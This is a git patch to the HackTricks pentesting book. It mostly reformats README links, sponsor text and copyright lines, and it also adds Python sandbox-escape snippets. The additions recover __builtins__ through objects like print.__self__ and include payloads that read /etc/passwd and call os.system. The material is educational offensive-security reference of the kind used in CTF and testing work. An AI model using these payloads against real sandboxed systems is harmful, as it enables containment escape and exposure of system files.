From 8625431ec68fd890c9c5b3071a72c221016c565f Mon Sep 17 00:00:00 2001 From: CPol Date: Mon, 4 Oct 2021 11:09:20 +0000 Subject: [PATCH] GitBook: [master] 517 pages modified --- README.md | 18 +++++++++--------- misc/basic-python/bypass-python-sandboxes.md | 16 ++++++++++++++-- 2 files changed, 23 insertions(+), 11 deletions(-) diff --git a/README.md b/README.md index 37053d553..e2665938f 100644 --- a/README.md +++ b/README.md @@ -20,8 +20,8 @@ Here you will find the **typical flow** that **you should follow when pentesting **Click in the title to start!** -If you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/) **\*\*\[**PEASS & HackTricks telegram group here**\]\(**[https://t.me/peass](https://t.me/peass)**\), or** follow me on Twitter ****[**🐦**](https://emojipedia.org/bird/)**\[**@carlospolopm**\]\(**[https://twitter.com/carlospolopm](https://twitter.com/carlospolopm)**\)**. -**If you want to** share some tricks with the community **you can also submit** pull requests **to \[**[https://github.com/carlospolop/hacktricks\*\*\]\(https://github.com/carlospolop/hacktricks](https://github.com/carlospolop/hacktricks**]%28https://github.com/carlospolop/hacktricks)\) **that will be reflected in this book. +If you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/) [**PEASS & HackTricks telegram group here**](https://t.me/peass)**, or** follow me on Twitter ****[**🐦**](https://emojipedia.org/bird/)\*\*\*\*[**@carlospolopm**](https://twitter.com/carlospolopm). +**If you want to** share some tricks with the community **you can also submit** pull requests **to** [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks**]%28https://github.com/carlospolop/hacktricks) **that will be reflected in this book. Don't forget to** give ⭐ on the github\*\* to motivate me to continue developing this book. {% hint style="danger" %} @@ -32,17 +32,15 @@ Do you use **Hacktricks every day**? Did you find the book **very** **useful**? If you want to know about my **latest modifications**/**additions** or you have **any suggestion for HackTricks** or **PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/)[**telegram group**](https://t.me/peass), or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book and don't forget to **give ⭐** on **github** to **motivate** **me** to continue developing this book. +[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop) + ## Corporate Sponsors -### \*\*\*\*[**INE**](https://ine.com/)\*\*\*\* +### [**INE**](https://ine.com/) ![](.gitbook/assets/ine_logo-3-.jpg) -[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop) - -\*\*\*\*[**INE**](https://ine.com/) is a great platform to start learning or **improve** your **IT knowledge** through their huge range of **courses**. I personally like and have completed many from the [**cybersecurity section**](https://ine.com/pages/cybersecurity). **INE** also provides with the official courses to prepare the **certifications** from [**eLearnSecurity**](https://elearnsecurity.com/)**.** - -Copyright © Carlos Polop 2020. Except where otherwise specified, the text on [HACK TRICKS](https://github.com/carlospolop/hacktricks) by Carlos Polop is licensed under the [**Commons Clause**](https://commonsclause.com/) \(which allow you to use this content freely WITHOUT commercial use\). +[**INE**](https://ine.com/) is a great platform to start learning or **improve** your **IT knowledge** through their huge range of **courses**. I personally like and have completed many from the [**cybersecurity section**](https://ine.com/pages/cybersecurity). **INE** also provides with the official courses to prepare the **certifications** from [**eLearnSecurity**](https://elearnsecurity.com/)**.** #### **Courses and Certifications reviews** @@ -50,7 +48,9 @@ You can find **my reviews of the certifications eMAPT and eWPTXv2** \(and their {% page-ref page="courses-and-certifications-reviews/ine-courses-and-elearnsecurity-certifications-reviews.md" %} -\*\*\*\* + + +Copyright © Carlos Polop 2020. Except where otherwise specified, the text on [HACK TRICKS](https://github.com/carlospolop/hacktricks) by Carlos Polop is licensed under the [**Commons Clause**](https://commonsclause.com/) \(which allow you to use this content freely WITHOUT commercial use\). **Copyright © Carlos Polop 2021. Except where otherwise specified, the rights of the text on** [**HACKTRICKS**](https://github.com/carlospolop/hacktricks) **by Carlos Polop are reserved.** diff --git a/misc/basic-python/bypass-python-sandboxes.md b/misc/basic-python/bypass-python-sandboxes.md index 7b42d34de..310bc624b 100644 --- a/misc/basic-python/bypass-python-sandboxes.md +++ b/misc/basic-python/bypass-python-sandboxes.md @@ -206,9 +206,13 @@ get_flag.__globals__['__builtins__']['__import__']("os").system("ls") #### Python3 ```python -# Obtain the builtins from a defined function -get_flag.__globals__['__builtins__'].__import__("os").system("ls") +# Obtain builtins from a globally defined function +print.__self__ +dir.__self__ +globals.__self__ +# Obtain the builtins from a defined function +get_flag.__globals__['__builtins__'] # The os._wrap_close class is usually loaded. Its scope gives direct access to os package (as well as __builtins__) [ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "'os." in str(x) ][0]['system']('ls') @@ -227,6 +231,14 @@ __builtins__=([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ __builtins__["__import__"]('os').system('ls') ``` +### Builtins payloads + +```python +# Possible payloads once you have found the builtins +.open("/etc/passwd").read() +.__import__("os").system("ls") +``` + ### Discovering loaded variables Checking the **`globals`** and **`locals`** is a good way to know what you can access.